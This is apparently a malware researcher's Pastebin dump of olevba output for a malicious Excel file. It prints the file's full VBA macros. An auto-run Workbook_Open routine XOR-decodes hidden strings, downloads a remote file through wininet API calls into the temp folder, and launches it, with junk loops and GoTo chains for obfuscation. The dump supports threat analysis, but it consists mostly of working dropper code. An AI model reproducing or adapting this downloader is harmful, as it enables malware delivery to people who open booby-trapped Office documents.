Advertisement
dynamoo

Malicious Excel macro

Mar 19th, 2015
575
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 1.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 1.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisBook.cls
  13. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisBook'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16. Phamt72loaj
  17. End Sub
  18.  
  19. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  20. ANALYSIS:
  21. +----------+---------------+----------------------------------------+
  22. | Type     | Keyword       | Description                            |
  23. +----------+---------------+----------------------------------------+
  24. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  25. +----------+---------------+----------------------------------------+
  26. -------------------------------------------------------------------------------
  27. VBA MACRO Page1.cls
  28. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page1'
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. (empty macro)
  31. -------------------------------------------------------------------------------
  32. VBA MACRO Page2.cls
  33. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page2'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35. (empty macro)
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Page3.cls
  38. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page3'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. (empty macro)
  41. -------------------------------------------------------------------------------
  42. VBA MACRO Heroro6.bas
  43. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Heroro6'
  44. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  45. Option Explicit
  46.  
  47. #If VBA7 And Win64 Then
  48. Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  49. Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  50. Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  51. Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  52. #Else
  53. Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  54. Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  55. Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  56. Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  57. #End If
  58. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  59. ANALYSIS:
  60. +------------+----------------+-----------------------------------------+
  61. | Type       | Keyword        | Description                             |
  62. +------------+----------------+-----------------------------------------+
  63. | Suspicious | Lib            | May run code from a DLL                 |
  64. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  65. |            |                | may be used to obfuscate strings        |
  66. |            |                | (option --decode to see all)            |
  67. | IOC        | wininet.dll    | Executable file name                    |
  68. +------------+----------------+-----------------------------------------+
  69. -------------------------------------------------------------------------------
  70. VBA MACRO File55.bas
  71. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File55'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73.  
  74. '''+----                                                                   --+
  75. '''|                             Ariawase 0.6.0                              |
  76. '''|                Ariawase is free library for VBA cowboys.                |
  77. '''|          The Project Page: https://github.com/vbaidiot/Ariawase         |
  78. '''+--                                                                   ----+
  79. Option Explicit
  80. Option Private Module
  81.  
  82.  
  83.  
  84. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  85. ANALYSIS:
  86. +------+----------------------+-------------+
  87. | Type | Keyword              | Description |
  88. +------+----------------------+-------------+
  89. | IOC  | https://github.com/v | URL         |
  90. |      | baidiot/Ariawase     |             |
  91. +------+----------------------+-------------+
  92. -------------------------------------------------------------------------------
  93. VBA MACRO File643.bas
  94. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File643'
  95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  96.  
  97.  
  98.  
  99.  
  100. Public Enum CdoProtocolsAuthentication
  101.     cdoAnonymous = 0
  102.     cdoBasic = 1
  103.     cdoNTLM = 2
  104. End Enum
  105.  
  106. Public Const cdo7bit        As String = "7bit"
  107. Public Const cdo8bit        As String = "8bit"
  108. Public Const cdoISO_2022_JP As String = "iso-2022-jp"
  109. Public Const cdoShift_JIS   As String = "shift-jis"
  110. Public Const cdoEUC_JP      As String = "euc-jp"
  111. Public Const cdoUTF_8       As String = "utf-8"
  112.  
  113. Public Const cdoBase64          As String = "base64"
  114. Public Const cdoQuotedPrintable As String = "quoted-printable"
  115. Sub Phamt72loaj()
  116.  
  117. Dim KLAKKKSMMCV As Integer
  118. For KLAKKKSMMCV = 0 To 0
  119. If KLAKKKSMMCV = 22 Then End
  120. Next KLAKKKSMMCV
  121. KokoRuko
  122.  
  123. End Sub
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  132. ANALYSIS:
  133. +------------+----------------+-----------------------------------------+
  134. | Type       | Keyword        | Description                             |
  135. +------------+----------------+-----------------------------------------+
  136. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  137. |            |                | may be used to obfuscate strings        |
  138. |            |                | (option --decode to see all)            |
  139. +------------+----------------+-----------------------------------------+
  140. -------------------------------------------------------------------------------
  141. VBA MACRO Loop4.bas
  142. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Loop4'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144. Option Explicit
  145.  
  146.  
  147. Private Const MBL = 8162
  148. Private Const AAN As String = "PRO1"
  149. Private Const IOTD = 1
  150. Private Const IFNCW = &H4000000
  151. Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
  152.     #If VBA7 And Win64 Then
  153.         Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
  154.     #Else
  155.         Dim HOHOFO2 As Long, HOHOFI1 As Long
  156.     #End If
  157.     Dim HIHORE2 As Long
  158.     Dim HAHABU4 As String * MBL, HUHUHISD6 As String
  159.     Dim HEHEIFI5 As Integer, KLOPA8 As Double
  160.     HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
  161.     If HOHOFO2 = 0 Then
  162.         Exit Function
  163.     End If
  164.     HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
  165.     If HOHOFI1 = 0 Then
  166.         KLOPA8 = 0
  167.     Else
  168.         BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
  169.         HUHUHISD6 = HAHABU4
  170.         Do While HIHORE2 <> 0
  171.             BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
  172.             HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
  173.         Loop
  174.         KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
  175.         Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
  176.         Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
  177.     End If
  178.     HUDZOAKJJ HOHOFI1
  179.     HUDZOAKJJ HOHOFO2
  180.     HUHUHISD6 = ""
  181.     If KLOPA8 Then
  182.         TOPONO6 = True
  183.     End If
  184. End Function
  185.  
  186. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  187. ANALYSIS:
  188. +------------+----------------+-----------------------------------------+
  189. | Type       | Keyword        | Description                             |
  190. +------------+----------------+-----------------------------------------+
  191. | Suspicious | Open           | May open a file                         |
  192. | Suspicious | Write          | May write to a file (if combined with   |
  193. |            |                | Open)                                   |
  194. | Suspicious | Put            | May write to a file (if combined with   |
  195. |            |                | Open)                                   |
  196. | Suspicious | Binary         | May read or write a binary file (if     |
  197. |            |                | combined with Open)                     |
  198. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  199. |            |                | may be used to obfuscate strings        |
  200. |            |                | (option --decode to see all)            |
  201. +------------+----------------+-----------------------------------------+
  202. -------------------------------------------------------------------------------
  203. VBA MACRO Corob5.bas
  204. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Corob5'
  205. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  206. Private Sub cdsf56GG()
  207. GoTo cssghjtky7
  208. cssghjtky7:
  209. GoTo louioui89
  210. louioui89:
  211. GoTo mgsmshm
  212. mgsmshm:
  213. GoTo ntyntyty
  214. ntyntyty:
  215. GoTo nyttdndny
  216. nyttdndny:
  217. GoTo brtjtjty
  218. brtjtjty:
  219.  
  220. End Sub
  221. Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
  222.     Dim ziZItoTO1 As Long
  223.     Dim loLOpoPO1 As String
  224.     Dim keKEpePE1 As Integer
  225.    
  226.     Dim DKKALLLAKK As Integer
  227. For DKKALLLAKK = 0 To 0
  228. If DKKALLLAKK = 25 Then End
  229. Next DKKALLLAKK
  230.    
  231.     Dim keKEpePE11 As Integer
  232.  
  233.     For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
  234.         keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
  235.         keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
  236.         Dim LOAJNNCDHJ As Integer
  237.         For LOAJNNCDHJ = 0 To 0
  238.         If LOAJNNCDHJ = 14 Then End
  239.         Next LOAJNNCDHJ
  240.         loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
  241.          Dim PAPPAPPPAPP As Integer
  242.         For PAPPAPPPAPP = 0 To 0
  243.         If PAPPAPPPAPP = 4 Then End
  244.         Next PAPPAPPPAPP
  245.     Next ziZItoTO1
  246.    MANAHD3 = loLOpoPO1
  247. End Function
  248.  
  249. Private Sub IHYbeffeVuJC()
  250. GoTo asefbttttawf3
  251. asefbttttawf3:
  252. GoTo sgr4bsgbf67gfh
  253. sgr4bsgbf67gfh:
  254. GoTo sdvxcxb
  255. sdvxcxb:
  256. GoTo SSSDFBSS
  257. SSSDFBSS:
  258. GoTo UTYRURU
  259. UTYRURU:
  260. GoTo KKTKTJT
  261. KKTKTJT:
  262. GoTo IhzKeee2ascfacas2zw
  263. IhzKeee2ascfacas2zw:
  264.  
  265. End Sub
  266.  
  267. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  268. ANALYSIS:
  269. +------------+---------+-----------------------------------------+
  270. | Type       | Keyword | Description                             |
  271. +------------+---------+-----------------------------------------+
  272. | Suspicious | Chr     | May attempt to obfuscate specific       |
  273. |            |         | strings                                 |
  274. | Suspicious | Xor     | May attempt to obfuscate specific       |
  275. |            |         | strings                                 |
  276. +------------+---------+-----------------------------------------+
  277. -------------------------------------------------------------------------------
  278. VBA MACRO Class1.cls
  279. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  280. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  281. Private xInit As Boolean
  282. Private xItems As Variant
  283. Private xLength As Long
  284.  
  285. Public Property Get Item1() As Variant
  286.     Dim i As Long: i = 0
  287.     If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
  288. End Property
  289.  
  290. Public Property Get Item2() As Variant
  291.     Dim i As Long: i = 1
  292.     If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
  293. End Property
  294.  
  295. Public Property Get Item3() As Variant
  296.     Dim i As Long: i = 2
  297.     If xLength <= i Then Err.Raise 380
  298.     If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
  299. End Property
  300.  
  301. Public Property Get Item4() As Variant
  302.     Dim i As Long: i = 3
  303.     If xLength <= i Then Err.Raise 380
  304.     If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
  305. End Property
  306.  
  307. Public Sub Init(ParamArray itms() As Variant)
  308.     If xInit Then Err.Raise 5
  309.     xItems = itms
  310.     xLength = UBound(itms) + 1
  311.    
  312.     If xLength < 2 Then Err.Raise 5
  313.     xInit = True
  314. End Sub
  315.  
  316. Public Function ToArray() As Variant
  317.     ToArray = xItems
  318. End Function
  319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  320. ANALYSIS:
  321. No suspicious keyword or IOC found.
  322. -------------------------------------------------------------------------------
  323. VBA MACRO Module1.bas
  324. in file: 1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  326. Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D"
  327. Private Const rabannsd4 = 30
  328. Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C"
  329. Private Const rabannsd2 = 31
  330. Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C"
  331. Private Const rabannsd1 = 33
  332. Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D"
  333. Private Const rabannsd0 = 34
  334.  
  335. Private Const ceew343vgVV = "Quyuiui3MM"
  336. Sub KokoRuko()
  337.  
  338.  
  339. Dim lodppo21
  340. Set lodppo21 = CreateObject _
  341. (MANAHD3(ceew343vgVV, cemMmm381))
  342. Dim UPANDNNN2
  343. Const conspol3 = 2
  344. Dim DLAPPAKKVD3 As Integer
  345. For DLAPPAKKVD3 = 0 To 0
  346. If DLAPPAKKVD3 = 4 Then End
  347. Next DLAPPAKKVD3
  348. Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
  349. Dim LPPAOOOAOAOMXNXNN As Integer
  350. For LPPAOOOAOAOMXNXNN = 0 To 0
  351. If LPPAOOOAOAOMXNXNN = 5 Then End
  352. Next LPPAOOOAOAOMXNXNN
  353. BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
  354. Dim PAOOKDKDKDAJWHNN21 As Integer
  355. For PAOOKDKDKDAJWHNN21 = 0 To 0
  356. If PAOOKDKDKDAJWHNN21 = 5 Then End
  357. Next PAOOKDKDKDAJWHNN21
  358. Set dwwwdFO2 = CreateObject _
  359. (MANAHD3(ceew343vgVV, cemMmm381))
  360. Dim ASS555ASS As Integer
  361. For ASS555ASS = 0 To 0
  362. If ASS555ASS = 5 Then End
  363. Next ASS555ASS
  364. If dwwwdFO2.FileExists(BIGABBDH1) Then
  365. dwwwdFO2.DeleteFile BIGABBDH1
  366. End If
  367. Dim APOHRKJBMXIKSHJ As Integer
  368. For APOHRKJBMXIKSHJ = 0 To 0
  369. If APOHRKJBMXIKSHJ = 15 Then End
  370. Next APOHRKJBMXIKSHJ
  371. If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
  372. End If
  373. Set SSSS = Nothing
  374. Dim ALOOEPPPEPP2 As Integer
  375. For ALOOEPPPEPP2 = 0 To 0
  376. If ALOOEPPPEPP2 = 8 Then End
  377. Next ALOOEPPPEPP2
  378. If dwwwdFO2.FileExists(BIGABBDH1) Then
  379. End If
  380. Dim PLKJHAGGGTTTS As Integer
  381. For PLKJHAGGGTTTS = 0 To 0
  382. If PLKJHAGGGTTTS = 3 Then End
  383. Next PLKJHAGGGTTTS
  384. Set SASASA = CreateObject _
  385. (MANAHD3(ceew343vgVV, vEVeE3286))
  386. Dim APQIEJAQPLQ As Integer
  387. For APQIEJAQPLQ = 0 To 0
  388. If APQIEJAQPLQ = 5 Then End
  389. Next APQIEJAQPLQ
  390. SASASA.Open BIGABBDH1
  391.  
  392. End Sub
  393. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  394. ANALYSIS:
  395. +------------+--------------+-----------------------------------------+
  396. | Type       | Keyword      | Description                             |
  397. +------------+--------------+-----------------------------------------+
  398. | Suspicious | CreateObject | May create an OLE object                |
  399. | Suspicious | Open         | May open a file                         |
  400. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  401. |            |              | be used to obfuscate strings (option    |
  402. |            |              | --decode to see all)                    |
  403. +------------+--------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement